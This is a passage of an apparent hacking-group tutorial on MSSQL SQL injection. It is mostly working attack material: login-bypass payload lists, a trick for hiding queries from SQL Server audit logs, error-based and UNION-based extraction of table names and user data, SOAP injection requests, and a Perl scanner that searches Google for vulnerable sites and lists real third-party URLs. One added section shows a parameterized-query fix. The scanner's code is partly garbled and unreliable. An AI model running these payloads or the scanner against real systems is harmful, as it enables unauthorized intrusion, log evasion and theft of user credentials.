++++++++++++++++++++++++++++++++++++++++++++++++
SQL injection attacks occur when malicious SQL commands are injected into a predefined SQL query
in order to alter the outcome of the query. Take the example of an application that requests a user id
for authentication. The application adds this user ID to a predefined SQL query to perform authentication.
However, instead of providing a valid user name, the attacker can input a specialized SQL fragment
that terminates the predefined SQL query and forces the execution of a new SQL query. In this
way the attacker can execute any SQL command on the host system without even needing to log in.
A successful SQL injection exploit can read sensitive data from the database, modify database data
(Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover
the content of a given file present on the DBMS filesystem and in some cases issue commands to the operating system.
An application is vulnerable to SQL injection attack when:
- User input is incorrectly filtered for string literal escape characters embedded in SQL statements.
- User input is not restricted (e.g. through strong typing) and thereby can be made to execute
in an unexpected manner.
SQL injection is found in any application that needs to talk to a database, including:
- Authentication forms (Login Pages)
- Search forms
- E-Commerce sites
- Forum / Webboard
- Content Management Systems (CMSs that use a DB), such as:
Joomla Components (http://www.milw0rm.com/search.php?dong=joomla)
Mambo Components (http://www.milw0rm.com/search.php?dong=mambo)
WordPress Plugins (http://www.milw0rm.com/search.php?dong=wordpress)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01b] - How to Test sites that are vulnerable in SQL Injection
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
We must make a list of all input fields whose values could be used in crafting a SQL query,
including the hidden fields of POST requests, and then test them separately, trying to interfere with
the query and to generate an error. The very first test usually consists of adding a single quote ('),
a double quote (") or a semicolon (;) to the field under test.
[Simple URL] http://www.example.com/news.asp?id=10
[Test SQLi] http://www.example.com/news.asp?id=10'
It's vulnerable in SQL injection,If the output some error like this:
[HTTP Response]-----------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------
The next approach is to use "OR/AND" operators to test for a SQL injection vulnerability:
if the content differs from that of the original URL (e.g. all data is dumped
from the database), the site is vulnerable to SQL injection.
[Simple URL] http://www.example.com/news.asp?id=2
[output]------------------------------------------------------------------------------------
News: 2
Details: Preventing blind SQL injection attacks, Most security professionals know ...
[End Output]--------------------------------------------------------------------------------
[Test SQLi] http://www.example.com/news.asp?id=2' or '1'='1
[output]------------------------------------------------------------------------------------
News: 1
Details: SQL injection attack infects hundreds of thousands of websites ...
News: 2
Details: Preventing blind SQL injection attacks, Most security professionals know ...
News: 3
Details: Mass SQL injection, There's another round of mass SQL injections going on which has infected ...
News: 4
Details: New Botnet Malware Spreading SQL injection attack tool ...
[End Output]--------------------------------------------------------------------------------
Great! Can you see the difference from the original URL? (It is vulnerable to SQL injection attacks.)
It returns every row from the DB. Why?
[ASP_code]
var sql = "SELECT * FROM news WHERE id = '" + getid +"'";
[End ASP_code]
[Final query //id=2]
SELECT * FROM news WHERE id = '2' // This will return news 2
[End id=2]
[Final query //id=2' or 'a'='a] // Testing the SQLi vuln
SELECT * FROM news WHERE id = '2' or 'a'='a' // ' or 'a'='a is included in the SQL statement and the condition is TRUE,
// so it will return all news (id=1,2,3,...)
[End id=2' or 'a'='a]
++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01c] - Bypass Authentication with SQL Injection
++++++++++++++++++++++++++++++++++++++++++++++++++++
This is a basic technique for bypassing login when the application uses a DB to check authentication.
An attacker may be able to bypass this check with SQL injection.
[Example scripts]
+-----------------------------+
| ' or 1=1 -- |
| a' or 1=1 -- |
| " or 1=1 -- |
| a" or 1=1 -- |
| ' or 1=1 # |
| " or 1=1 # |
| or 1=1 -- |
| ' or 'x'='x |
| " or "x"="x |
| ') or ('x'='x |
| ") or ("x"="x |
| ' or username LIKE '%admin% |
+-----------------------------+
| USERNAME: ' or 1/* |
| PASSWORD: */ =1 -- |
+-----------------------------+
| USERNAME: admin' or 'a'='a |
| PASSWORD: '# |
+-----------------------------+
[Login ASP_code]----------------------------------------------------------------------------
var sql = "SELECT * FROM users WHERE username = '" + formusr + "' AND password ='" + formpwd + "'";
[End Login ASP_code]------------------------------------------------------------------------
When we input something like this:
formusr = admin
formpwd = ' or 'a'='a
[SQL Query]---------------------------------------------------------------------------------
SELECT * FROM users WHERE username = 'admin' AND password = '' or 'a'='a'
[End Code]----------------------------------------------------------------------------------
This SQL condition is TRUE and bypasses the login process, so you don't need the admin's password. (Just use ' or 'a'='a)
If we input something like this:
formusr = ' or 1=1 --
formpwd = anything
[SQL Query]---------------------------------------------------------------------------------
SELECT * FROM users WHERE username = '' or 1=1 -- AND password = 'anything'
[End Code]----------------------------------------------------------------------------------
** Note **
-- is the comment operator of MSSQL; it comments out everything following it.
/*Comment*/ is an inline comment; leaving it unclosed comments out the rest of the query, and it can be used to bypass blacklisting:
DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
SELECT/*avoid-spaces*/password/**/FROM/**/Members
If the application first fetches the record by username and then compares the returned MD5 with the MD5 of the supplied password,
you need some extra tricks to fool the application into bypassing authentication. You can UNION the results with a known password and the MD5 hash
of the supplied password. In this case the application compares your password with your supplied MD5 hash instead of the MD5 from the database.
formusr = admin
formpwd = pass ' AND 1=2 UNION ALL SELECT 'admin', '1a1dc91c907325c69271ddf0c944bc72
1a1dc91c907325c69271ddf0c944bc72 = MD5(pass)
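Added example (not part of the original article) covering both the news.asp query in [0x01b] and the login query above: the article's string-concatenated query next to a parameterized version of the same check, run offline against an in-memory SQLite table. The table, its single 'admin' row and the password value are constructed sample data.

```python
"""Added example (not from the original article): the login query from the
section above, assembled by string concatenation as in the ASP snippet, next to
a parameterized version of the same check. It runs offline against an
in-memory SQLite table; the table and its single 'admin' row are constructed
sample data, and the plaintext password column mirrors the article's query."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one user, stored exactly as the article's
    query expects (password hashing is a separate concern, left out here)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", "s3cret-sample"))
    conn.commit()
    return conn


def build_vulnerable_sql(formusr: str, formpwd: str) -> str:
    """Same concatenation as the article's ASP: form input becomes SQL text."""
    return ("SELECT * FROM users WHERE username = '" + formusr
            + "' AND password ='" + formpwd + "'")


def login_vulnerable(conn: sqlite3.Connection, formusr: str, formpwd: str) -> bool:
    """Authentication succeeds if the concatenated query returns any row."""
    rows = conn.execute(build_vulnerable_sql(formusr, formpwd)).fetchall()
    return len(rows) > 0


def login_parameterized(conn: sqlite3.Connection, formusr: str, formpwd: str) -> bool:
    """Hardened form: placeholders are bound by the driver, so a quote, OR or
    -- inside the input is compared as data and never parsed as SQL."""
    rows = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (formusr, formpwd),
    ).fetchall()
    return len(rows) > 0


def run_cases() -> dict:
    """Run the article's two bypass inputs plus a genuine login through both
    versions; each value is (vulnerable_result, parameterized_result)."""
    conn = make_db()
    cases = {
        "valid_login": ("admin", "s3cret-sample"),
        "or_a_equals_a": ("admin", "' or 'a'='a"),
        "comment_out_password": ("' or 1=1 --", "anything"),
    }
    return {
        name: (login_vulnerable(conn, u, p), login_parameterized(conn, u, p))
        for name, (u, p) in cases.items()
    }


if __name__ == "__main__":
    for name, (vuln, safe) in run_cases().items():
        print(f"{name:22s} vulnerable={vuln!s:5s} parameterized={safe}")
```

The two bypass inputs log in through the concatenated query and fail through the bound one, while the genuine credentials work in both.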
+++++++++++++++++++++++++++++
[0x01d] - Audit Log Evasion
+++++++++++++++++++++++++++++
When we inject code with SQLi techniques, all of the SQL queries can be logged, and the admin can see what happened.
The technique to evade logging is to use "sp_password":
formusr = ' or 1=1 -- sp_password
formpwd = anything
SQL Server does not log queries which include sp_password, for security reasons(!). So if you add --sp_password to your queries,
they will not appear in the SQL Server logs (they will, of course, still be in the web server logs; use POST if possible).
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01e] - (Perl Script) SQL-Google Search for Vulnerable Sites
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A good way to search for sites with SQL injection vulnerabilities is "Google"
(it is also powerful to search every search engine with IRC bots). We developed a simple Perl script for
finding SQL injection holes (MSSQL, MySQL, MS Access, Oracle) named "SQL-Google Search":
[code]-----------------------------------------------------------------------------------
#!/usr/bin/perl
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;
my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
print "+++++++++++++++++++++++++++++++\n";
print "+ SQL - Google Search +\n";
print "+ CWH Underground +\n";
print "+++++++++++++++++++++++++++++++\n\n";
print "Insert Dork:";
chomp( my $dork = <stdin> );
print "Total Query Pages (10 Links/Pages) :";
chomp( my $page = <stdin> );
print "\n[+] Result:\n\n";
for($start = 0;$start != $page*10;$start += 10)
{
$t = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;
$ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($t);
if ($response->is_success)
{
$c = $response->content;
@stuff = split(/<a $line(@stuff)="" $out="$1;" $ua="LWP::UserAgent-" \"="" class="l/ig)" foreach="" g;="" href="http://www.blogger.com/,$c);" if($line="~/(.*)" s="" {="">new(agent => 'Mozilla 5.2');
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($out);
$error = $response->content();
if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)
{print "$out => Could be Vulnerable in MySQL Injection!!\n";}
elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
{print "$out => Could be Vulnerable in MS Access Injection!!\n";}
elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
{print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
{print "$out => Could be Vulnerable in Oracle Injection!!\n";}
}
}
}
}
[End code]----------------------------------------------------------------------------------
[output]------------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++
+ SQL - Google Search +
+ CWH Underground +
+++++++++++++++++++++++++++++++
Insert Dork:index.asp?sid=
Total Query Pages (10 Links/Pages) :5
[+] Result:
http://www.ris.org.uk/index.asp?sid=7&mid=5' => Could be Vulnerable in MSSQL Injection!!
http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307' => Could be Vulnerable in MSSQL Injection!!
http://www.ilri.org/research/Index.asp?SID=4' => Could be Vulnerable in MSSQL Injection!!
[End output]--------------------------------------------------------------------------------
############################################
[0x02] - MSSQL Normal SQL Injection Attack
############################################
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
We can use the information in error messages produced by MS SQL Server to get almost any data we want.
- "GROUP BY" is a Microsoft SQL Server clause used to group the output of a particular SQL query.
- "HAVING" is a clause used to specify a search condition for a group or an aggregate.
It is always used with "GROUP BY"; otherwise an error is returned.
Because of how these two clauses work, we can take advantage of them in order to
obtain a particular table name and all column names of that table. We will explain using an example.
First, the target has a table called "news", and news has three columns: news_id, news_author and news_detail.
The vulnerable page is http://www.example.com/page.asp?id=1
The query in this page is something like:
[Query]-----------------------------------------------------------------------------
var query = "SELECT * FROM news WHERE news_id= '" + column+ "'";
[End query]-------------------------------------------------------------------------
So, we can inject a HAVING clause in order to observe the returned error:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1' HAVING 1=1--
[End SQLi]--------------------------------------------------------------------------
The query will be
SELECT * FROM news WHERE news_id='1' HAVING 1=1--'
We will get the following error:
------------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in
the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
------------------------------------------------------------------------------------
From this error we learn the table name used in this page, "news", and
one column name contained in that table, "news_id".
The error originates from using HAVING without GROUP BY.
Moreover, we can get the other column names by combining GROUP BY and HAVING:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1' GROUP BY news.news_id HAVING 1=1--
[End SQLi]--------------------------------------------------------------------------
The query will be
SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id HAVING 1=1--'
We will get the error
------------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_author' is invalid in
the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
------------------------------------------------------------------------------------
Now we know the second column name of the table (news) is "news_author". The third column name can be obtained
by adding the second column name to the previous query:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1' GROUP BY news.news_id,news.news_author HAVING 1=1--
[End SQLi]--------------------------------------------------------------------------
The query will be
SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id,news.news_author HAVING 1=1--'
The request will generate the following error:
------------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in
the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
------------------------------------------------------------------------------------
The third column name, "news_detail", pops up in the returned error. If there were more columns,
we could add news_detail to the GROUP BY clause of the previous request to get the fourth column name.
Once we have added all columns to the GROUP BY clause, we get a normal result and
we know for certain that we have obtained all column names of the table.
In this example, the request below generates no error:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1' GROUP BY news.news_id,news.news_author,news_detail HAVING 1=1--
[End SQLi]--------------------------------------------------------------------------
The query will be
SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id,news.news_author,news_detail HAVING 1=1--'
As no error is returned, we know that the news table consists of three columns: "news_id", "news_author" and "news_detail".
++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x02b] - ODBC Error Message Attack with "CONVERT"
++++++++++++++++++++++++++++++++++++++++++++++++++++
In our opinion, MSSQL discloses a lot of information in returned errors. This is useful for programmers debugging their application, but
it is also valuable to attackers, as seen in the previous section.
In this section we provide another method of exploiting MSSQL errors, through a function called "convert".
convert is used to convert between two data types; when the given data cannot be converted to the target type,
it returns an error. Let's see an example:
In this example, we show you how to obtain the MSSQL version, DB name and user name.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)--
[End SQLi]--------------------------------------------------------------------------
Error Message returned:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007
22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
Now we know the version of MSSQL and the OS (Windows Server 2003). Let's enumerate the DB name.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--
[End SQLi]--------------------------------------------------------------------------
Error Message returned:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'cwhdb' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
We now know the database name is "cwhdb". Next we query for the current user the application connects to the DB as:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--
[End SQLi]--------------------------------------------------------------------------
Error Message returned:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'sa' to data type int.
/showthread.asp, line 9
------------------------------------------------------------------------------------
W00t!! W00t!! It uses "sa" privileges, lol. This tells us that we can use the extended
stored procedure "XP_CMDSHELL" to execute arbitrary commands.
In the next example, we show you how to obtain table names, column names and data.
Take a look at our first request:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--
[End SQLi]--------------------------------------------------------------------------
"information_schema.tables" stores information about tables in databases and there is a field called "table_name"
which stores names of each table. The result of this request is something like this:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'threads' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
The query returns 'threads' as an nvarchar value; since it cannot be converted to int, the error is returned.
Therefore we know from this error that the first table is "threads". The next step is looking for the second table:
we only append a WHERE clause to the query in the above request.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+
not+in+('threads')))--
[End SQLi]--------------------------------------------------------------------------
We will get an error like this:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'users' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
Again, from the error we know the second table is "users". To get another table, we just extend our list of known tables, for example:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+
not+in+('threads','users')))--
[End SQLi]--------------------------------------------------------------------------
And we will get an error:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'forums' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
This means the third table is "forums". On the other hand, if the previous request returns something like this:
------------------------------------------------------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10
------------------------------------------------------------------------------------
it means this database consists of only two tables, threads and users.
OK, now we have all the tables. The next target is column names.
The method to retrieve column names is not much different from getting table names.
We merely change "information_schema.tables" to "information_schema.columns" and "table_name" to "column_name",
but we have to add "table_name" to the WHERE clause in order to specify the table we will pull column names from.
Enough talk, let's see an example:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))--
[End SQLi]--------------------------------------------------------------------------
From this request, we get the following error:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9
------------------------------------------------------------------------------------
By the same approach as for table names, we immediately know that the first column of table 'users' is "uname".
For another column name, we add a bit to the WHERE clause:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+
and+column_name+not+in+('uname')))--
[End SQLi]--------------------------------------------------------------------------
We will get the error below:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9
------------------------------------------------------------------------------------
So we know the second column of table 'users' is "upass". To get more column names,
we only append to the known list, as we did for table names. For example:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+
and+column_name+not+in+('uname','upass')))--
[End SQLi]--------------------------------------------------------------------------
The Error message:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'email' to data type int.
/showthread.asp, line 9
------------------------------------------------------------------------------------
So, the third column is "email". But if the error is:
------------------------------------------------------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10
------------------------------------------------------------------------------------
this means no more columns are left. Next is the real target that attackers want: the data.
If we look carefully, we will see that the idea is no different from getting tables and columns.
Use the same manner but change only the table and column name.
If we want the uname data in table users, we can do this:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users))--
[End SQLi]--------------------------------------------------------------------------
We will see a uname in the returned error:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
Now we know that there is an 'admin' in column 'uname' of table 'users'. For another uname,
we just build a known list, as we did for tables and columns:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin')))--
[End SQLi]--------------------------------------------------------------------------
Error again:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'cwh' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
OK, we get another "uname", which is 'cwh'. If we try the following request:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')))--
[End SQLi]--------------------------------------------------------------------------
we get an error like this:
------------------------------------------------------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/showthread.asp, line 10
------------------------------------------------------------------------------------
It means there are only two unames in the users table (admin, cwh).
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x02d] - MSSQL Injection in Web Services (SOAP Injection)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Web services use XML messages that follow the SOAP standard and have been popular with traditional enterprises.
In such systems there is often a machine-readable description of the operations offered by the service, written in the
Web Services Description Language (WSDL).
SOAP is often used in large-scale enterprise applications where individual tasks are performed by different computers to
improve performance. It is often found where a web application is deployed as a front-end to an existing application.
Let's take a look at a SOAP request like this:
[SOAP Request]------------------------------------------------------------------------------
POST /webservice/service.asmx HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/GetUserInfo"
Host: testcwh.cwh.net
Content-Length: 345
Expect: 100-continue
Connection: Keep-Alive
<soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:body>
<getuserinfo xmlns="http://tempuri.org/"><username>admin</username><password>1234</password></getuserinfo></soap:body></soap:envelope>
[End Request]-------------------------------------------------------------------------------
Can you see the username (admin) and password (1234) that are sent to the server side?
What happens if we inject a (') single quote into the username field, like this: <username>admin'</username><password>1234</password>,
before it is sent to the server side? We can use a web proxy (Burp Suite, Paros Proxy) to intercept the SOAP request and SOAP response.
[SOAP Response when we inject a single quote]-----------------------------------------------
HTTP/1.1 200 OK
Date: Mon, 26 Jan 2009 15:45:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 1057
Connection: close
X-Junk: xxxxxxxxxxx
<soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:body>
<getuserinforesponse xmlns="http://tempuri.org/"><getuserinforesult><erroroccured>true</erroroccured><errorstr>
System.Data.OleDb.OleDbException: Unclosed quotation mark after the character string ''.
Incorrect syntax near '81'.
at System.Data.OleDb.OleDbDataReader.ProcessResults(OleDbHResult hr)
at System.Data.OleDb.OleDbDataReader.NextResult()
at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)
at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)
at Service.GetUserInfo(String username, String password)</errorstr><sqlquery>SELECT * FROM users WHERE username='admin''
AND password='81dc9bdb52d04dc20036dbd8313ed055'</sqlquery><id>-1</id><joindate>0001-01-01T00:00:00</joindate></getuserinforesult>
</getuserinforesponse></soap:body></soap:envelope>
[End Response]------------------------------------------------------------------------------
OK, the SOAP response returns an error message like that. We can use the simple SQLi techniques that we showed you
in section [0x02b] - ODBC Error Message Attack with "CONVERT". Let's use this SQLi:
admin' and 1=convert(int,@@version)--
[SOAP Request/Response]---------------------------------------------------------------------
*** Request ***
POST /webservice/service.asmx HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/GetUserInfo"
Host: testcwh.cwh.net
Content-Length: 384
<soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:body>
<getuserinfo xmlns="http://tempuri.org/"><username>admin' and 1=convert(int,@@version)--</username><password>1234</password>
</getuserinfo></soap:body></soap:envelope>
*** Response ***
HTTP/1.1 200 OK
Date: Wed, 28 Jan 2009 15:59:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 1266
Connection: close
X-Junk: xxxxxxxxxxx
<soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:body>
<getuserinforesponse xmlns="http://tempuri.org/"><getuserinforesult><erroroccured>true</erroroccured><errorstr>
System.Data.OleDb.OleDbException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
Feb 9 2007 22:47:07
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
' to data type int.
at System.Data.OleDb.OleDbDataReader.ProcessResults(OleDbHResult hr)
at System.Data.OleDb.OleDbDataReader.NextResult()
at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)
at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)
at Service.GetUserInfo(String username, String password)</errorstr><sqlquery>SELECT * FROM users WHERE username='admin'
and 1=convert(int,@@version)--' AND password='81dc9bdb52d04dc20036dbd8313ed055'</sqlquery><id>-1</id><joindate>0001-01-01T00:00:00</joindate>
</getuserinforesult></getuserinforesponse></soap:body></soap:envelope>
[End]---------------------------------------------------------------------------------------
W00t!! W00t!! We can enumerate the MSSQL version: Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86).
Then we can use the SQLi techniques mentioned above (dump tables, columns, data, etc.).
++++++++++++++++++++++++++++++++++++++++++++++
[0x02c] - MSSQL Injection with UNION Attack
++++++++++++++++++++++++++++++++++++++++++++++
This method differs from both previous methods because we do not get information through errors;
instead, we see it at some point in the returned page.
First of all, we have to know the exact number of selected columns. We can find it by using the ORDER BY clause:
http://www.example.com/page.asp?id=1 order by 1--
http://www.example.com/page.asp?id=1 order by 2--
http://www.example.com/page.asp?id=1 order by 3--
http://www.example.com/page.asp?id=1 order by 4--
and so on
We observe the result of each request until we get an error like this.
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e14'
The ORDER BY position number 5 is out of range of the number of items in the select list.
/showthread.asp, line 9
------------------------------------------------------------------------------------
This means the page selects four columns from the table; the error occurs when we request http://www.example.com/page.asp?id=1 order by 5--
Now, we use the UNION operator to gain information.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,44--
[End SQLi]--------------------------------------------------------------------------
We will see "11", "22", "33" or "44" appear at some point in the returned page. We assume that
we have already located the position where "44" occurs on the screen.
(We should remember this position because it is where our information will appear.)
As we found "44" on the screen, we replace "44" with "@@version" in order to find the version of MSSQL.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,@@version--
[End SQLi]--------------------------------------------------------------------------
We will see the version of MSSQL appear in the position where "44" occurred.
At this point, we know that the next piece of information will definitely take its place in this position.
The rest is to find table names, column names and data. As we saw in the previous section,
we can obtain table names and column names through "information_schema".
We still use the same way in this approach.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables--
[End SQLi]--------------------------------------------------------------------------
We will see the first table on the screen. We assume it is a table called 'threads'. We can find the next table with the following request.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables where table_name not in ('threads')--
[End SQLi]--------------------------------------------------------------------------
We assume the retrieved table is 'users'. So, we keep appending the known tables to the list until the position where "44" occurred comes back blank.
After we get all the table names that we want, we move on to gathering column names.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users'--
[End SQLi]--------------------------------------------------------------------------
From this request, we will see the first column in table 'users'. We assume it is 'uname'. For another column, we can use the following request.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users' and
column_name not in ('uname')--
[End SQLi]--------------------------------------------------------------------------
We get the second column, which is 'upass', and we continue appending the known columns to the list until we get a blank result.
The most wanted information is the data. It is quite simple once we have obtained table names and column names. We just use the following request.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users--
[End SQLi]--------------------------------------------------------------------------
We will get data such as admin from the request. In order to get another row, we only append the values already retrieved to the list, as follows.
[SQLi]------------------------------------------------------------------------------
